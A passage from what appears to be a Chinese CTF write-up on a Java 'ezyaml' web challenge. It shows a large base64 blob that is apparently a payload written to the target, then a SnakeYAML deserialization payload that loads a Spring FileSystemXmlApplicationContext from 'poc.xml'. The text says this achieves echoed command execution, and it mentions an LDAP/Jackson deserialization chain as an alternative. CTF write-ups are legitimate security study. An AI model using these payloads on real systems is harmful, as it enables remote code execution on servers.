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 },1048576]]

写入

最后执行

1	yamlContent=!!org.springframework.context.support.FileSystemXmlApplicationContext [ !!java.lang.String "file:poc.xml" ]

成功将命令执行结果回显出来

还有一种方法就是打LDAP反序列化Jackson原生链

About this Post

This post is written by p0l1st, licensed under CC BY-NC 4.0.

#Java安全

2025磐石初赛Web两道Java

web-java_ez

ezyaml

About this Post

Polar靶场-Java

D^3CTF2025 jtar(复现)